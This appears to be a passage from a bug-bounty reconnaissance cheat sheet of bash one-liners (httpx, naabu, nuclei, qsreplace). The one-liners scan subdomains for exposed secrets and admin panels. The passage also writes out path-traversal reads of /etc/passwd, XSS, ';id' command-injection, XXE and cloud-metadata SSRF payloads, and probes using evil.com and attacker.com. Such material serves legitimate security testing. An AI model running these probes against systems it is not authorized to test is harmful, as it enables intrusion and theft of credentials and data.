Response\n```bash\ncat urls.txt | httpx -silent -fr 'eyJ' -o jwt_leaks.txt\n```\n\nServer Version Disclosure (Fingerprinting)\n```bash\ncat subdomains.txt | httpx -silent -server -o server_versions.txt\n```\n\nTest PUT Method for File Upload\n```bash\ncat subdomains.txt | httpx -silent -method PUT -path '/test.txt' -body 'test upload' -mc 201,200 -o put_upload_possible.txt\n```\n\nCheck for Debug Endpoints\n```bash\ncat subdomains.txt | httpx -silent -path /debug -mc 200 -o debug_endpoints.txt\n```\n\nFind Content Security Policy Bypass (Open Wildcards)\n```bash\ncat subdomains.txt | httpx -silent -hx | grep 'Content-Security-Policy' | grep '*'\n```\n\nCheck for Public .DS_Store Files (Directory Listing)\n```bash\ncat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_leaks.txt\n```\n\nFind Open Jenkins Panels\n```bash\ncat subdomains.txt | httpx -silent -path /jenkins -mc 200 -o open_jenkins.txt\n```\n\nDetect Internal IP Leaks in Response\n```bash\ncat urls.txt | httpx -silent -fr '10.' 
-o internal_ip_leak.txt\n```\n\nSearch for Open API Documentation (Swagger)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/swagger-ui.html\\n/api-docs\\n/openapi.json') -mc 200 -o open_api_docs.txt\n```\n\nFind Exposed .env Files (Sensitive Configs)\n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env.txt\n```\n\nDetect Exposed MySQL Dumps\n```bash\ncat subdomains.txt | httpx -silent -path /db.sql -mc 200 -o mysql_dumps.txt\n```\n\nCheck for Misconfigured CORS (Allow-All)\n```bash\ncat urls.txt | httpx -silent -H 'Origin: https://evil.com' -fr 'Access-Control-Allow-Origin: https://evil.com' -o cors_misconfig.txt\n```\n\nFind Exposed Adminer (DB Management Interface)\n```bash\ncat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o exposed_adminer.txt\n```\n\nSearch for Exposed Backup Files (.bak)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/index.php.bak\\n/config.bak\\n/db.bak') -mc 200 -o backup_files.txt\n```\n\nSearch for Test/Dev Subdomains (Staging)\n```bash\nsubfinder -d target.com | grep -Ei 'dev|test|staging|qa' \u003e staging_subdomains.txt\n```\n\nDetect Open RDP Servers (Network Exposures)\n```bash\ncat ips.txt | naabu -p 3389 -silent -o open_rdp.txt\n```\n\nDetect AWS S3 Buckets via Subdomains\n```bash\ncat subdomains.txt | grep -E 's3.amazonaws.com|amazonaws' \u003e s3_buckets.txt\n```\n\nIdentify Weak Security Headers (Lack of CSP, HSTS)\n```bash\ncat urls.txt | httpx -silent -hx | grep -v -E 'Strict-Transport-Security|Content-Security-Policy' \u003e weak_headers.txt\n```\n\nCheck for Exposed Docker API\n```bash\ncat ips.txt | naabu -p 2375 -silent -o open_docker_api.txt\n```\n\nFind Open Grafana Dashboards\n```bash\ncat subdomains.txt | httpx -silent -path /login -mc 200 -fr 'Grafana' -o open_grafana.txt\n```\n\nCheck for Public PHP Info Pages (Leaking Config)\n```bash\ncat urls.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt\n```\n\nFind 
Exposed Laravel Debug Panels\n```bash\ncat subdomains.txt | httpx -silent -path /_debugbar -mc 200 -o laravel_debug.txt\n```\n\nLook for Open ElasticSearch (Data Exposure)\n```bash\ncat ips.txt | naabu -p 9200 -silent -o open_elasticsearch.txt\n```\n\nIdentify Directory Traversal (Simple Payload)\n```bash\ncat urls.txt | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o directory_traversal.txt\n```\n\nFind Open Kibana Dashboards (Sensitive Logs)\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt\n```\n\nDetect Exposed Wordpress Debug Logs\n```bash\ncat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wp_debug_logs.txt\n```\n\nFind Exposed FTP Servers (Anonymous Access)\n```bash\ncat ips.txt | naabu -p 21 -silent -o open_ftp.txt\n```\n\nDetect Open MongoDB Databases (No Auth)\n```bash\ncat ips.txt | naabu -p 27017 -silent -o open_mongo.txt\n```\n\nIdentify Open PhpMyAdmin Panels\n```bash\ncat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o open_phpmyadmin.txt\n```\n\nSearch for Backup Files with Extensions (.bak, .old)\n```bash\ncat subdomains.txt | gauplus | grep -E '\\.bak|\\.old|\\.backup' \u003e backup_files_found.txt\n```\n\nCheck for Open Directories (Index of Listings)\n```bash\ncat subdomains.txt | httpx -silent -mc 200 -fr 'Index of /' -o open_directories.txt\n```\n\nFind Public GraphQL Endpoints (API Leaks)\n```bash\ncat subdomains.txt | httpx -silent -path /graphql -mc 200 -o open_graphql.txt\n```\n\nIdentify Misconfigured AWS Bucket via Headers\n```bash\ncat urls.txt | httpx -silent -hx | grep -i 'x-amz' \u003e aws_bucket_leaks.txt\n```\n\nCheck for Publicly Accessible Jenkins Script Console\n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt\n```\n\nCheck for Exposed SVN Files\n```bash\ncat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_leaks.txt\n```\n\nFind Publicly Exposed Config.json 
Files\n```bash\ncat subdomains.txt | httpx -silent -path /config.json -mc 200 -o config_json_exposed.txt\n```\n\nIdentify Unauthenticated Redis Servers\n```bash\ncat ips.txt | naabu -p 6379 -silent -o open_redis.txt\n```\n\nDetect Exposed Private Keys in URLs\n```bash\ncat urls.txt | grep -Ei 'private_key|id_rsa|pem' \u003e private_key_leaks.txt\n```\n\nSearch for Open API Keys in URLs\n```bash\ncat urls.txt | grep -Ei 'apikey|api_key|token' \u003e exposed_api_keys.txt\n```\n\nDetect Exposed .bash_history Files\n```bash\ncat subdomains.txt | httpx -silent -path /.bash_history -mc 200 -o bash_history_exposed.txt\n```\n\nCheck for Open etc/passwd via LFI\n```bash\ncat urls.txt | qsreplace '../../../../../etc/passwd' | httpx -silent -fr 'root:x:' -o lfi_passwd.txt\n```\n\nFind Open Exposed Backup ZIP Files\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/site_backup.zip\\n/db_backup.zip') -mc 200 -o backup_zip_exposed.txt\n```\n\nDetect Exposed Logs (server.log, error.log)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/server.log\\n/error.log\\n/application.log') -mc 200 -o exposed_logs.txt\n```\n\nFind Publicly Accessible Admin Panels (General)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/admin\\n/administrator\\n/admin/login\\n/admin.php\\n/adminer.php') -mc 200 -o open_admin_panels.txt\n```\n\nDetect Exposed YAML Config Files\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/config.yaml\\n/application.yaml') -mc 200 -o exposed_yaml.txt\n```\n\nCheck for Directory Traversal to Windows Files\n```bash\ncat urls.txt | qsreplace 'C:\\Windows\\win.ini' | httpx -silent -fr 'for 16-bit app support' -o windows_lfi.txt\n```\n\nFind Open Jupyter Notebooks (No Auth)\n```bash\ncat subdomains.txt | httpx -silent -path /tree -mc 200 -o open_jupyter.txt\n```\n\nIdentify Server Error Pages (500 Errors)\n```bash\ncat urls.txt | httpx -silent -mc 500 -o 
server_errors.txt\n```\n\nCheck for Open SNMP Services\n```bash\ncat ips.txt | naabu -p 161 -silent -o open_snmp.txt\n```\n\nFind Exposed Laravel Environment Files (.env)\n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env_files.txt\n```\n\nDetect Git Repository Exposures (.git/config)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git_configs.txt\n```\n\nLook for Exposed Dockerfiles\n```bash\ncat subdomains.txt | httpx -silent -path /Dockerfile -mc 200 -o exposed_dockerfiles.txt\n```\n\nIdentify Publicly Accessible AWS Credentials\n```bash\ncat subdomains.txt | httpx -silent -path /aws/credentials -mc 200 -o exposed_aws_credentials.txt\n```\n\nSearch for Backup Database Dumps (SQL, SQLite)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/db.sql\\n/database.sql\\n/dump.sql\\n/backup.db') -mc 200 -o db_dumps.txt\n```\n\nDetect Exposed SSL Certificates (pem)\n```bash\ncat subdomains.txt | httpx -silent -path /ssl/cert.pem -mc 200 -o exposed_ssl.txt\n```\n\nFind Open Configuration.php Files (Joomla)\n```bash\ncat subdomains.txt | httpx -silent -path /configuration.php -mc 200 -o joomla_config_exposed.txt\n```\n\nHunt for Open Jenkins Dashboards\n```bash\ncat subdomains.txt | httpx -silent -path /jenkins -mc 200 -o open_jenkins.txt\n```\n\nDetect Exposed Magento Admin Panels\n```bash\ncat subdomains.txt | httpx -silent -path /admin -mc 200 -o magento_admin.txt\n```\n\nCheck for Exposed API Documentation (Swagger UI)\n```bash\ncat subdomains.txt | httpx -silent -path /swagger-ui.html -mc 200 -o swagger_exposed.txt\n```\n\nDetect GitLab or GitHub Enterprise Instances\n```bash\ncat subdomains.txt | httpx -silent -path /users/sign_in -mc 200 -o gitlab_or_ghe.txt\n```\n\nFind Misconfigured CORS (Wildcard)\n```bash\ncat urls.txt | httpx -silent -H \"Origin: https://evil.com\" -fr 'Access-Control-Allow-Origin: https://evil.com' -o cors_misconfig.txt\n```\n\nScan for Server Status Pages 
(Apache/Nginx)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/server-status\\n/nginx_status') -mc 200 -o server_status_exposed.txt\n```\n\nIdentify Exposed Debug Pages (PHP Info)\n```bash\ncat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt\n```\n\nDetect Open Redis Stats Pages (Unprotected UI)\n```bash\ncat subdomains.txt | httpx -silent -path /redis -mc 200 -o redis_ui_exposed.txt\n```\n\nScan for Exposed Kubernetes Dashboard\n```bash\ncat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt\n```\n\nLook for GraphQL Playground\n```bash\ncat subdomains.txt | httpx -silent -path /playground -mc 200 -o graphql_playground_exposed.txt\n```\n\nFind Exposed OpenAPI Spec Files (openapi.json)\n```bash\ncat subdomains.txt | httpx -silent -path /openapi.json -mc 200 -o openapi_exposed.txt\n```\n\nScan for Exposed GCP Metadata Servers\n```bash\ncat ips.txt | naabu -p 80,443 -silent | httpx -path /computeMetadata/v1/ -H 'Metadata-Flavor: Google' -mc 200 -o gcp_metadata_exposed.txt\n```\n\nFind Exposed Jenkins Console Logs\n```bash\ncat subdomains.txt | httpx -silent -path /console -mc 200 -o jenkins_console_logs.txt\n```\n\nCheck for Open Jira Dashboards (Exposed Tickets)\n```bash\ncat subdomains.txt | httpx -silent -path /secure/Dashboard.jspa -mc 200 -o jira_exposed.txt\n```\n\nDetect Exposed Env Variables via /env (SpringBoot)\n```bash\ncat subdomains.txt | httpx -silent -path /env -mc 200 -o springboot_env_exposed.txt\n```\n\nFind Misconfigured GitHub Actions Workflows (YAML)\n```bash\ncat subdomains.txt | gauplus | grep -Ei '.github/workflows/.*\\.yml' \u003e github_workflows_exposed.txt\n```\n\nScan for Default Admin Credentials on Login Pages\n```bash\ncat urls.txt | nuclei -t cves/ -tags 'default-login' -o default_creds.txt\n```\n\nCheck for Misconfigured Prometheus Servers\n```bash\ncat subdomains.txt | httpx 
-silent -path /graph -mc 200 -o prometheus_exposed.txt\n```\n\nFind Exposed Backup Files (ZIP, TAR, SQL)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/backup.tar.gz\\n/dump.sql') -mc 200 -o exposed_backups.txt\n```\n\nDetect Exposed Open Directory Listings\n```bash\ncat subdomains.txt | httpx -silent -fr '\u003ctitle\u003eIndex of /' -o open_directories.txt\n```\n\nFind Open Jenkins Script Console (RCE Point)\n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt\n```\n\nScan for Exposed Kubernetes Kubelet APIs (Unauth Access)\n```bash\ncat ips.txt | httpx -silent -path /pods -mc 200 -o kubelet_exposed.txt\n```\n\nLook for Apache Struts Vulnerable Endpoints\n```bash\ncat subdomains.txt | httpx -silent -path /struts2-showcase/index.action -mc 200 -o struts_vuln.txt\n```\n\nIdentify Open Tomcat Manager Consoles\n```bash\ncat subdomains.txt | httpx -silent -path /manager/html -mc 200 -o tomcat_manager_open.txt\n```\n\nDetect CVE-2021-3129 (Laravel Debug Mode RCE)\n```bash\ncat subdomains.txt | httpx -silent -path /_ignition/execute-solution -mc 200 -o laravel_rce.txt\n```\n\nFind Exposed Config.json / settings.json\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/config.json\\n/settings.json') -mc 200 -o exposed_json_configs.txt\n```\n\nCheck for Outdated WordPress (Version Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /readme.html -mc 200 -o wordpress_version.txt\n```\n\nFind Exposed Log Files (.log)\n```bash\ncat subdomains.txt | httpx -silent -path /error.log -mc 200 -o exposed_logs.txt\n```\n\nDetect Misconfigured GraphQL Endpoints (Introspection Enabled)\n```bash\ncat subdomains.txt | httpx -silent -path /graphql -H 'Content-Type: application/json' -d '{\"query\":\"query IntrospectionQuery {__schema { queryType { name }}}\"}' -o graphql_introspection_enabled.txt\n```\n\nScan for Exposed Config.php in WordPress / Joomla\n```bash\ncat subdomains.txt 
| httpx -silent -path /wp-config.php -mc 200 -o wp_config_exposed.txt\n```\n\nDetect Open API Endpoints (via common paths)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/api/v1/\\n/api/\\n/api/v2/\\n/app_dev.php/api/') -mc 200 -o open_api_endpoints.txt\n```\n\nCheck for Exposed GitHub Personal Access Tokens (PATs)\n```bash\ncat subdomains.txt | gauplus | grep -E 'token=[a-z0-9]+' \u003e github_tokens_leak.txt\n```\n\nFind Misconfigured AWS Buckets (S3)\n```bash\ncat subdomains.txt | httpx -silent -path / -mc 200 -o s3_buckets_exposed.txt\n```\n\nScan for Exposed Laravel Log Files\n```bash\ncat subdomains.txt | httpx -silent -path /storage/logs/laravel.log -mc 200 -o laravel_log_exposed.txt\n```\n\nCheck for Outdated Apache Version via Server Header\n```bash\ncat subdomains.txt | httpx -silent -fr 'Server: Apache/2.4' -o outdated_apache.txt\n```\n\nDetect PHPMyAdmin Open Login Pages\n```bash\ncat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o phpmyadmin_open.txt\n```\n\nLook for Unprotected Kibana Instances\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o kibana_open.txt\n```\n\nScan for Public Grafana Dashboards\n```bash\ncat subdomains.txt | httpx -silent -path /login -mc 200 -o grafana_login_open.txt\n```\n\nSearch for Common Backup Extensions (bak, old, save)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/index.php.bak\\n/config.old\\n/config.save') -mc 200 -o backup_files_exposed.txt\n```\n\nFind Misconfigured ElasticSearch Instances (Public Index)\n```bash\ncat ips.txt | httpx -silent -path /_cat/indices?v -mc 200 -o elasticsearch_exposed.txt\n```\n\nLook for Exposed Jenkins Build Logs\n```bash\ncat subdomains.txt | httpx -silent -path /job/test/lastBuild/consoleText -mc 200 -o jenkins_build_logs.txt\n```\n\nFind Open Adminer DB Management Tools\n```bash\ncat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o adminer_exposed.txt\n```\n\nDetect Exposed SVN 
Directories\n```bash\ncat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_exposed.txt\n```\n\nDetect Exposed .git Repos (Source Code Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o git_exposed.txt\n```\n\nFind Sensitive Files using common patterns (env, db creds, ssh keys)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/.env\\n/database.yml\\n/id_rsa\\n/config.php\\n/secrets.yml') -mc 200 -o sensitive_files.txt\n```\n\nDetect Exposed Docker and Kubernetes Dashboard\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy\\n/docker') -mc 200 -o kube_docker_exposed.txt\n```\n\nScan for Exposed Environment Variables in Responses\n```bash\ncat subdomains.txt | httpx -silent -fr 'AWS_ACCESS_KEY_ID|SECRET_KEY|DB_PASSWORD' -o secrets_in_response.txt\n```\n\nFind Public Swagger API Documentation (API Discovery)\n```bash\ncat subdomains.txt | httpx -silent -path /swagger.json -mc 200 -o swagger_exposed.txt\n```\n\nCheck for Exposed Server-Status Pages (Apache/Nginx Debug Info)\n```bash\ncat subdomains.txt | httpx -silent -path /server-status -mc 200 -o server_status_exposed.txt\n```\n\nScan for Open Redis, Memcached, MongoDB Ports (Unauth Access)\n```bash\nnaabu -list subdomains.txt -ports 6379,11211,27017 -silent -o open_db_ports.txt\n```\n\nIdentify Publicly Accessible .DS_Store (File Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_exposed.txt\n```\n\nFind Exposed Wordpress Debug Log (Sensitive Info)\n```bash\ncat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wp_debug_log.txt\n```\n\nCheck for Exposed Internal IP in Responses (SSR Leak)\n```bash\ncat subdomains.txt | httpx -silent -fr '10\\.|192\\.168\\.|172\\.' 
-o internal_ip_leak.txt\n```\n\nFind Laravel Env Leak via Incorrect Env Handler\n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o laravel_env_leak.txt\n```\n\nScan for Exposed Backup Folders\n```bash\ncat subdomains.txt | httpx -silent -path /backup -mc 200 -o backup_folder_exposed.txt\n```\n\nLook for Open Joomla Installers\n```bash\ncat subdomains.txt | httpx -silent -path /installation/index.php -mc 200 -o joomla_installer.txt\n```\n\nDetect Exposed Debug Pages (debug=true)\n```bash\ncat subdomains.txt | httpx -silent -fr 'debug=true' -o debug_pages.txt\n```\n\nFind Open Jira Dashboards\n```bash\ncat subdomains.txt | httpx -silent -path /secure/Dashboard.jspa -mc 200 -o jira_open.txt\n```\n\nScan for Exposed Backup Files (config.old, index.bak)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/config.old\\n/index.bak\\n/wp-config.php.save') -mc 200 -o backup_leaks.txt\n```\n\nDetect Open Admin Portals (Common Paths)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/admin\\n/login\\n/dashboard\\n/console') -mc 200 -o open_admin_portals.txt\n```\n\nFind Exposed Debug Toolbar (Django Debug)\n```bash\ncat subdomains.txt | httpx -silent -path /__debug__/ -mc 200 -o django_debug_toolbar.txt\n```\n\nDetect Open Directories with Readable Files\n```bash\ncat subdomains.txt | httpx -silent -fr '\u003ctitle\u003eIndex of /' -o open_directory_listing.txt\n```\n\nIdentify Exposed Proxy Logs (Squid / HAProxy)\n```bash\ncat subdomains.txt | httpx -silent -path /var/log/squid/access.log -mc 200 -o proxy_logs_exposed.txt\n```\n\nCheck for Public WebSockets Endpoints (Leaky API)\n```bash\ncat subdomains.txt | httpx -silent -path /socket.io -mc 200 -o websocket_exposed.txt\n```\n\nFind Public GraphQL Consoles (Interactive API)\n```bash\ncat subdomains.txt | httpx -silent -path /graphiql -mc 200 -o graphiql_open.txt\n```\n\nScan for Open Hadoop Resource Manager\n```bash\ncat subdomains.txt | httpx -silent -path 
/ws/v1/cluster/info -mc 200 -o hadoop_exposed.txt\n```\n\nDetect Exposed PHPInfo Pages (Info Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt\n```\n\nFind Publicly Accessible Wordpress XMLRPC (Brute Force Possible)\n```bash\ncat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o xmlrpc_open.txt\n```\n\nDetect Open ElasticSearch Instances (Data Exposure)\n```bash\nnaabu -list subdomains.txt -p 9200 -silent | httpx -silent -path /_cat/indices?v -mc 200 -o open_elasticsearch.txt\n```\n\nScan for Open Kubernetes Config (Cluster Info Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /.kube/config -mc 200 -o kube_config_exposed.txt\n```\n\nFind GraphQL Endpoints with Introspection Enabled\n```bash\ncat subdomains.txt | httpx -silent -path /graphql -mc 200 -fr 'Introspection' -o graphql_introspection.txt\n```\n\nDetect Misconfigured CORS (Allow-Origin: )\n```bash\ncat subdomains.txt | httpx -silent -H \"Origin: https://evil.com\" -fr 'Access-Control-Allow-Origin: \\*' -o cors_misconfig.txt\n```\n\nLook for Exposed Adminer (DB Management Tool)\n```bash\ncat subdomains.txt | httpx -silent -path /adminer.php -mc 200 -o adminer_exposed.txt\n```\n\nDetect Open Redis Commander UI (Unauth Control)\n```bash\ncat subdomains.txt | httpx -silent -path /redis/ -mc 200 -o redis_ui_exposed.txt\n```\n\nFind Public GitLab CI/CD Config (Pipeline Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /.gitlab-ci.yml -mc 200 -o gitlab_ci_exposed.txt\n```\n\nScan for Open Debug Mode in Flask Apps\n```bash\ncat subdomains.txt | httpx -silent -path /console -mc 200 -o flask_debug_console.txt\n```\n\nDetect Open Exim/Webmin Panels\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/exim\\n/webmin') -mc 200 -o open_exim_webmin.txt\n```\n\nFind Exposed Laravel Log Files (App Key Disclosure)\n```bash\ncat subdomains.txt | httpx -silent -path /storage/logs/laravel.log -mc 200 -o 
laravel_logs_exposed.txt\n```\n\nDetect Public AWS Config Files (Credentials Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /.aws/credentials -mc 200 -o aws_creds_exposed.txt\n```\n\nIdentify Open Favicon Files and Fingerprint Services\n```bash\ncat subdomains.txt | httpx -silent -path /favicon.ico -o favicons/ \u0026\u0026 for icon in favicons/*; do shasum -a 256 $icon; done\n```\n\nCheck for Exposed GitHub Workflow Files (.github/workflows)\n```bash\ncat subdomains.txt | httpx -silent -path /.github/workflows/ -mc 200 -o github_workflows_exposed.txt\n```\n\nFind Jenkins Consoles with Anon Access\n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_console.txt\n```\n\nScan for Default Tomcat Admin Panels\n```bash\ncat subdomains.txt | httpx -silent -path /manager/html -mc 200 -o tomcat_admin_exposed.txt\n```\n\nLook for Public Backup Files (tar/zip dumps)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.zip\\n/backup.tar.gz\\n/db.sql') -mc 200 -o exposed_backups.txt\n```\n\nCheck for Exposed Laravel Telescope Panels\n```bash\ncat subdomains.txt | httpx -silent -path /telescope -mc 200 -o laravel_telescope.txt\n```\n\nFind Exposed VNC/TeamViewer/Web RDP\n```bash\nnaabu -list subdomains.txt -p 5900,3389 -silent -o remote_access_ports.txt\n```\n\nDetect Open Grafana Panels (Unauth Access)\n```bash\ncat subdomains.txt | httpx -silent -path /login -mc 200 -fr 'Grafana' -o open_grafana.txt\n```\n\nScan for Misconfigured API Endpoints\n```bash\ncat subdomains.txt | nuclei -t misconfiguration/api-misconfiguration.yaml -o api_misconfigs.txt\n```\n\nIdentify Exposed Internal DNS Resolvers\n```bash\ncat subdomains.txt | dnsx -a -resp-only -silent | grep -E '10\\.|192\\.168\\.|172\\.' 
\u003e internal_dns.txt\n```\n\nDetect Anonymous FTP Access (File Exposure)\n```bash\nnmap -p 21 --script ftp-anon -iL subdomains.txt -oN ftp_anon_scan.txt\n```\n\nFind Exposed Configuration Pages (config.php)\n```bash\ncat subdomains.txt | httpx -silent -path /config.php -mc 200 -o config_php_exposed.txt\n```\n\nIdentify Publicly Available Magento Admin Panels\n```bash\ncat subdomains.txt | httpx -silent -path /admin -mc 200 -fr 'Magento' -o magento_admin_exposed.txt\n```\n\nCheck for SSRF by Detecting Response Based Redirects\n```bash\ncat subdomains.txt | httpx -silent -H \"X-Forwarded-For: attacker.com\" -fr 'Location: attacker.com' -o ssrf_possible.txt\n```\n\nDetect Exposed Env Files (.env with Secrets)\n```bash\ncat subdomains.txt | httpx -silent -path /.env -mc 200 -o exposed_env_files.txt\n```\n\nFind XMLRPC Enabled on WordPress (Brute Force Vector)\n```bash\ncat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o wordpress_xmlrpc.txt\n```\n\nIdentify Open Kibana Dashboards (Sensitive Logs)\n```bash\ncat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o open_kibana.txt\n```\n\nFind Servers Exposing phpinfo() (Sensitive Config)\n```bash\ncat subdomains.txt | httpx -silent -path /phpinfo.php -mc 200 -o phpinfo_exposed.txt\n```\n\nDetect Publicly Accessible Swagger APIs\n```bash\ncat subdomains.txt | httpx -silent -path /swagger-ui/ -mc 200 -o swagger_exposed.txt\n```\n\nSearch for SQL Dumps and Backup Files (db.sql/db.zip)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/db.sql\\n/backup.sql\\n/database.sql') -mc 200 -o sql_dumps_exposed.txt\n```\n\nDetect LFI Points (path traversal)\n```bash\ncat subdomains.txt | gf lfi | httpx -silent -o lfi_possible_urls.txt\n```\n\nIdentify Reflected XSS via GET Parameters\n```bash\ncat subdomains.txt | gf xss | qsreplace '\"\u003e\u003cimg src=x onerror=alert(document.domain)\u003e' | httpx -silent -fr '\"\u003e\u003cimg src=x onerror=alert' -o reflected_xss.txt\n```\n\nFind 
Outdated WordPress Versions (Vuln Detection)\n```bash\ncat subdomains.txt | httpx -silent -path /readme.html -mc 200 -o wordpress_readme.txt\n```\n\nSearch for PHPMyAdmin Exposed Panels\n```bash\ncat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o phpmyadmin_exposed.txt\n```\n\nDetect Command Injection Points\n```bash\ncat subdomains.txt | gf command-injection | qsreplace ';id' | httpx -silent -fr 'uid=' -o cmd_injection.txt\n```\n\nFind Exposed Docker Daemon API (Remote Control)\n```bash\nnaabu -list subdomains.txt -p 2375 -silent | httpx -silent -o docker_api_exposed.txt\n```\n\nIdentify Open Git Directories (.git Exposed)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o git_dirs_exposed.txt\n```\n\nScan for Exposed Server Status Pages (Apache/Nginx)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/server-status\\n/nginx-status') -mc 200 -o server_status_exposed.txt\n```\n\nDetect Open Jenkins Panels with Script Console\n```bash\ncat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt\n```\n\nFind Exposed AWS S3 Buckets via Subdomains\n```bash\ncat subdomains.txt | nuclei -t s3-detect.yaml -o open_s3_buckets.txt\n```\n\nSearch for Potential Open Redirects (Unsafe Redirects)\n```bash\ncat subdomains.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt\n```\n\nFind Debug/Error Pages (Sensitive Stacktrace)\n```bash\ncat subdomains.txt | httpx -silent -sc -fr 'error\\|exception\\|trace' -o error_pages.txt\n```\n\nDetect Exposed Jenkins API Endpoints\n```bash\ncat subdomains.txt | httpx -silent -path /api/json -mc 200 -o jenkins_api_exposed.txt\n```\n\nFind Exposed Kubernetes Dashboard (Cluster Control)\n```bash\ncat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt\n```\n\nDetect SSRF via Open Redirect Chains\n```bash\ncat 
subdomains.txt | gf ssrf | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id\\|instance-id' -o ssrf_exploitable.txt\n```\n\nLook for Backup or Archive Files (tar.gz, zip)\n```bash\ncat subdomains.txt | httpx -silent -path-list \u003c(echo -e '/backup.tar.gz\\n/site-backup.zip') -mc 200 -o backup_files_exposed.txt\n```\n\nIdentify Known Vulnerable CMS Versions\n```bash\nnuclei -l subdomains.txt -t cves/ -o cms_cve_vulns.txt\n```\n\nFind JWT Tokens or Sensitive Tokens in Responses\n```bash\ncat subdomains.txt | httpx -silent -sr | grep -Eo 'eyJ[^\"]+' | tee jwt_tokens.txt\n```\n\nDetect Basic Auth Protected Pages (Bruteforce Target)\n```bash\ncat subdomains.txt | httpx -silent -sc -H \"Authorization: Basic fakeauth\" -o basic_auth_detected.txt\n```\n\nDetect Exposed .git Repositories (Full Source Code Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git_repos.txt\n```\n\nFind Public .DS_Store Files (Directory Listing Exposure)\n```bash\ncat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_exposed.txt\n```\n\nScan for Exposed .svn Repos (Source Code Leak)\n```bash\ncat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_repos_exposed.txt\n```\n\nFind Open GraphQL Endpoints (GraphQL Injection)\n```bash\ncat subdomains.txt | httpx -silent -path /graphql -mc 200 -o graphql_exposed.txt\n```\n\nDetect Exposed Laravel Debug Pages (Full App Secrets)\n```bash\ncat subdomains.txt | httpx -silent -path /_ignition/health-check -mc 200 -o laravel_debug_exposed.txt\n```\n\nCheck for File Upload Points (RCE Chances)\n```bash\ncat subdomains.txt | gf upload | httpx -silent -o file_upload_points.txt\n```\n\nFind XML External Entity (XXE) Injection Points\n```bash\ncat subdomains.txt | gf xxe | qsreplace 'file:///etc/passwd' | httpx -silent -fr 'root:x' -o xxe_exploitable.txt\n```\n\nDetect Misconfigured AWS Cognito Pools (Token Takeover)\n```bash\ncat subdomains.txt | nuclei -t 
